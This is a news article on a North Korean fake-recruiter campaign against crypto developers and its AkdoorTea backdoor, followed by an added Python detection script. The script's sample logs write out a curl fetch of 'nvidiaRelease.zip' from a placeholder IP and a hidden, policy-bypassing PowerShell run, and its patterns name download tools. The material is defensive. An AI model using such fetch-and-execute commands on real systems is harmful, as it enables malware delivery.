
North Korean hackers target crypto developers with a new ‘AkdoorTea’ backdoor via fake job offers.
Crypto and blockchain developers are being targeted by a North Korea–linked hacking campaign. Security researchers at ESET found fake recruiters on platforms like LinkedIn and Upwork luring developers with bogus job postings. After a candidate responds, the scammers send either a GitHub “coding test” or a link to a video interview. In one approach, the victim is asked to clone a GitHub project that secretly installs malware; in another, a fake video page instructs them to run terminal commands to “fix” a non-existent camera or microphone issue.
These tactics install various backdoors and stealers (e.g. BeaverTail, InvisibleFerret, OtterCookie, WeaselStore) on the victim’s system. Notably, researchers also discovered a new RAT called AkdoorTea. This backdoor is delivered via a disguised NVIDIA driver update: a batch script downloads an “nvidiaRelease.zip” file and runs a hidden script that launches AkdoorTea along with other malware.
Fake Recruitment Attacks Target Crypto Devs
The attackers brand themselves as recruiters offering lucrative Web3 or crypto development jobs. In practice, this “social engineering” lure invites interest from developers, then tricks them into installing malware. As ESET explains, the campaign spans multiple platforms (LinkedIn, Upwork, Freelancer, Crypto Jobs List) and uses either a phishing coding challenge or a video assessment.
In all cases, the payloads are the same: once the victim engages, Trojans and infostealers are deployed. ESET’s analysis found that victims ended up infected with multiple malicious tools, including BeaverTail, InvisibleFerret, OtterCookie, GolangGhost (aka WeaselStore), and PylangGhost. These tools are designed to exfiltrate data—especially browser data and cryptocurrency wallet keys—and even maintain remote access on the compromised machines.
Advanced Malware Toolkit: AkdoorTea and Friends
Beyond the fake job scheme, the attackers use a sophisticated toolkit for data and crypto theft. For example, the TsunamiKit suite is dropped onto victim systems to harvest credentials, inject cryptocurrency miners, and install spyware. Another payload, Tropidoor, borrows code from Lazarus Group malware (like the LightlessCan RAT) and has been found on systems in countries such as Kenya, Colombia and Canada.
The newest addition, AkdoorTea, is a Windows-based backdoor. It arrives via a batch script that mimics an NVIDIA driver update: when executed, it unpacks malware payloads and launches the AkdoorTea implant on the system. (The name “AkdoorTea” hints at its links to North Korea’s Lazarus Group – it resembles the earlier “Akdoor” backdoor, itself a variant of the NukeSped/Manuscrypt malware.) In short, the attackers combine off-the-shelf and recycled tools into a heavy-duty malware arsenal to steal cryptocurrency and proprietary data from developers’ machines.
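The delivery chain described above (a batch script fetching an archive named “nvidiaRelease.zip” and launching a hidden script, preceded by the recruiter lure on L3) lends itself to a simple process-log hunt. The following is an added defender-side example, not code from the article or from ESET: it parses constructed process-creation log lines in an assumed `IMAGE=… CMD=…` format and flags both the reported lure file name and the more general pattern of a .zip download followed within a short window by hidden or policy-bypassing script execution.

```python
import re
from datetime import datetime

# Constructed process-creation log lines (not taken from the article or ESET's report).
# Assumed format: "<ISO timestamp> IMAGE=<binary> CMD=<full command line>".
SAMPLE_LOGS = [
    "2025-09-01T10:02:11Z IMAGE=cmd.exe CMD=cmd.exe /c C:\\Users\\dev\\Downloads\\nvidia_update.bat",
    "2025-09-01T10:02:12Z IMAGE=curl.exe CMD=curl.exe -s -o %TEMP%\\nvidiaRelease.zip http://203.0.113.45/nvidiaRelease.zip",
    "2025-09-01T10:02:14Z IMAGE=powershell.exe CMD=powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File %TEMP%\\nv\\run.ps1",
    "2025-09-01T10:05:00Z IMAGE=git.exe CMD=git clone https://github.com/example-org/take-home-task.git",
    "2025-09-01T10:30:00Z IMAGE=curl.exe CMD=curl.exe -o driver.exe https://vendor.example/driver.exe",
]

LINE_RE = re.compile(r"^(?P<ts>\S+) IMAGE=(?P<image>\S+) CMD=(?P<cmd>.*)$")
# Common command-line download utilities on Windows.
DOWNLOAD_RE = re.compile(
    r"\b(curl(\.exe)?|wget|certutil(\.exe)?\s+-urlcache|bitsadmin|Invoke-WebRequest|iwr|DownloadFile)\b", re.I)
ARCHIVE_RE = re.compile(r"\.zip\b", re.I)
# Flags that hide or loosen script execution: hidden window, bypassed policy, silent wscript/cscript.
EVASIVE_EXEC_RE = re.compile(r"-(WindowStyle|w)\s+hidden|-ExecutionPolicy\s+Bypass|//B\b", re.I)
# File name ESET reported for the disguised "NVIDIA driver update" that drops AkdoorTea.
LURE_RE = re.compile(r"nvidiaRelease\.zip", re.I)

def parse(line):
    """Return {'ts': datetime, 'image': str, 'cmd': str}, or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return {"ts": ts, "image": m["image"], "cmd": m["cmd"]}

def find_suspicious_chains(lines, window_s=60):
    """Return (timestamp, reason, command) findings for the AkdoorTea-style delivery pattern:
    the known lure file name, or a .zip download followed within window_s by evasive execution."""
    findings, downloads = [], []
    for ev in filter(None, map(parse, lines)):
        cmd = ev["cmd"]
        if LURE_RE.search(cmd):
            findings.append((ev["ts"], "known lure artifact nvidiaRelease.zip", cmd))
        if DOWNLOAD_RE.search(cmd) and ARCHIVE_RE.search(cmd):
            downloads.append(ev)  # remember archive downloads to correlate with later execution
        if EVASIVE_EXEC_RE.search(cmd):
            for d in downloads:
                if 0 <= (ev["ts"] - d["ts"]).total_seconds() <= window_s:
                    findings.append((ev["ts"], "archive download followed by hidden script execution", cmd))
                    break
    return findings

if __name__ == "__main__":
    for ts, reason, cmd in find_suspicious_chains(SAMPLE_LOGS):
        print(f"{ts.isoformat()}  {reason}\n    {cmd}")
```

The ordinary `git clone` and the plain driver download in the sample are not flagged, so the correlation rule, not the download alone, carries the signal.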
Security Implications and Risk
This campaign highlights how social engineering at scale can aid a state-run cybercrime effort. One study notes that employment scams have surged: fake job offers grew 265% since 2021, with over $2.7 million lost in just the first four months of 2025. North Korea’s hackers leverage this trend by exploiting human trust in online job ads. Moreover, the stolen developer profiles feed into a wider North Korean “IT worker” fraud scheme (sometimes called WageMole). In this ongoing fraud, North Korean operatives use stolen identities and fake résumés to apply for real tech jobs abroad.
For instance, researchers at Trellix identified a case where an applicant named “Kyle Lankford” – later tied to known North Korean indicators – nearly secured a position at a US healthcare company. ESET warns this is a “hybrid threat,” merging classic identity theft with cyberespionage. (For context, the FBI confirmed the Lazarus Group – North Korea’s cyber unit – stole $100 million in cryptocurrency in one 2022 bridge hack.)